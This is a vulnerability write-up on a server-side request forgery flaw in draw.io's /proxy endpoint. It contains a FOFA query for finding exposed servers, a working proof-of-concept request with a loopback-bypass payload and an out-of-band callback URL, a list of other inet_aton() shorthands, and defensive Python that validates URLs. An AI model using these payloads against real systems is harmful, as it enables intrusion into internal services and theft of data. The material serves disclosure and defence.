Vulnerability description

JGraph draw.io is a configurable diagramming/whiteboard visualization application from JGraph.
draw.io versions before 18.0.4 contain a server-side request forgery (SSRF) vulnerability in the /proxy endpoint: the server fetches whatever URL is passed in the url parameter, so an attacker can make it request internal services and read back the responses to obtain sensitive information.

Affected scope

JGraph draw.io (versions before 18.0.4)

Network mapping

FOFA: title="Flowchart Maker"

Vulnerability reproduction

POC:

GET /proxy?url=http%3a//0:8080/ HTTP/1.1
Host: 127.0.0.1:8080
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="101"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36
sec-ch-ua-platform: "macOS"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8080/?mode=device&title=Untitled%20Diagram.drawio.xml&create=https%3A%2F%2Fxcd8bz39zlnis2ngq84j05tt7kda1z.oastify.com%2F&sync=manual&db=0&gh=0&tr=0&gapi=0&od=0&gl=0
Accept-Encoding: gzip, deflate
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

Payload: /proxy?url=http%3a//0:8080/

Note the host in the payload: 0 instead of localhost or 127.0.0.1. Where the server runs on Linux, the C library's inet_aton() accepts this shorthand and turns it into 0.0.0.0, and connecting to 0.0.0.0 reaches the local machine, so the proxied request lands on the draw.io host's own port 8080 (or any other service listening there) while slipping past filters that only reject the literal strings localhost and 127.0.0.1. Other inet_aton() shorthands for loopback (for example 127.1 or the decimal form 2130706433) work the same way. A vulnerable instance returns the body of the internal response through /proxy; a patched one refuses the request.
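
As an added example (illustrative code written for this write-up, not draw.io's own ProxyServlet and not a reproduction of its exact logic), the following Python models why the http://0:8080/ payload passes a string-based blocklist and shows the resolver-based check that rejects it. The function names and the BLOCKED_HOSTS set are assumptions made for the demonstration; the hardened check goes a little beyond the single payload on this page by also covering other inet_aton() shorthands, IPv6 literals and non-http schemes.

```python
"""
Added example: why `/proxy?url=http://0:8080/` slips past a string blocklist,
and a resolver-based allow check that rejects it.

Illustrative code for this write-up; NOT draw.io's ProxyServlet. The function
names and BLOCKED_HOSTS are assumptions made for the demonstration.
"""
import ipaddress
import socket
from urllib.parse import urlparse

# A naive filter of the kind the "0" host bypasses: it only compares the host
# string against a few literal spellings of loopback (assumed list).
BLOCKED_HOSTS = {"localhost", "127.0.0.1", "::1"}


def naive_is_allowed(url: str) -> bool:
    """String-blocklist check (weak): 'http://0:8080/' passes because '0' is not listed."""
    host = (urlparse(url).hostname or "").lower()
    return host not in BLOCKED_HOSTS


def resolve_ipv4(host: str):
    """Return the IPv4Address the C library would connect to for `host`, or None.

    socket.inet_aton() accepts the same shorthand as libc's inet_aton(): "0",
    "127.1", "2130706433" and "0x7f000001" all parse to real addresses.
    Checking the parsed address rather than the string is what closes the bypass.
    """
    try:
        return ipaddress.IPv4Address(socket.inet_aton(host))
    except OSError:
        pass
    # Hostname: a single DNS lookup (assumption: IPv4 only, result not pinned).
    try:
        return ipaddress.IPv4Address(socket.gethostbyname(host))
    except (OSError, ValueError):
        return None


def hardened_is_allowed(url: str, resolver=resolve_ipv4) -> bool:
    """Allow only http(s) URLs whose destination address is globally routable."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https"):
        return False  # no file://, gopher://, etc.
    host = parsed.hostname
    if not host:
        return False
    try:
        ip = ipaddress.ip_address(host)  # plain IPv4/IPv6 literal; "[::1]" arrives as "::1"
    except ValueError:
        ip = resolver(host)  # inet_aton shorthand or a DNS name
    if ip is None:
        return False
    # is_global rejects loopback, 0.0.0.0/8, RFC 1918, link-local
    # (169.254.169.254 cloud metadata), and other non-routable ranges.
    return ip.is_global


if __name__ == "__main__":
    for candidate in ("http://0:8080/", "http://127.1:8080/", "http://2130706433/",
                      "http://[::1]:8080/", "http://8.8.8.8/"):
        print(f"{candidate:28} naive={naive_is_allowed(candidate)!s:5} "
              f"hardened={hardened_is_allowed(candidate)}")
```

The hardened check only resolves once and never connects, so it does not by itself defeat DNS rebinding: a real proxy must open the socket to the address it validated rather than resolving the name a second time, and must re-run the check on every redirect target.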

(This article is for technical exchange and learning purposes only; using its content for illegal activities is strictly prohibited.)
